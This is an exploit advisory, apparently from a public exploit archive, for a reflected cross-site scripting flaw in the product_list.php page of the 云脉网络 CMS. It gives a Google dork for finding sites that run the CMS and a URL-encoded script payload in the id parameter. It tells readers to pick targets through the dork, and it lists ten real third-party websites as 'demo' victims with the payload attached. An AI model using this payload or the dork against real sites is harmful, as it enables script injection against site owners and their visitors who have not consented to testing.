######################
# Exploit Title : 云脉网络 CMS Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://yt-c.net/
# Google Dork : intext:" 技术支持:云脉网络"
# Date: 21 May 2016
# Tested On : Kali
# Contact:n3t.hacker@gmail.com
######################
# Vulnerable File : product_list.php
# Request Method: GET
# Payload : product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# Describe : Search dork and select Target. Put Payload After url such as :
# http://site.com/product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
#
# ... Ok
#
# Demo :
# http://www.ytjieqiang.com//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.ytyuyang.com.cn//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.weiyupcb.com//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.dongfangwgysy.com//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.yt-taida.com//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.senyue.cn/en//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://rongchao.cn//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.yhgjmy.cn//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.yanco.cn//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
# http://www.guotaihouse.com//product_list.php?id=-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28928808%29%3C/ScRiPt%3E&page=2
#
#
######################
# discovered by : Net Hacker
######################